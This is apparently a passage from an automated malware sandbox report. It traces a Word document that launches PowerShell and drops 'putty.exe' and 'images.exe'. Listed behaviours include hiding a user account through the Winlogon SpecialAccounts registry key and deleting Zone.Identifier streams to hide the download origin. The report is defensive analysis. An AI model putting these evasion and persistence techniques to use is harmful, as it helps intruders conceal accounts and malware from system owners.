        Source: putty.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
        Source: putty.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
        Source: images.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
        Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
        Source: C:\Users\user\AppData\Roaming\putty.exeFile opened: C:\ProgramData\images.exe:Zone.Identifier read attributes | delete
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeFile opened: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe:Zone.Identifier read attributes | delete
        Hides user accountsShow sources
        Source: C:\ProgramData\images.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList eC.vaAf
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess information set: NOOPENFILEERRORBOX
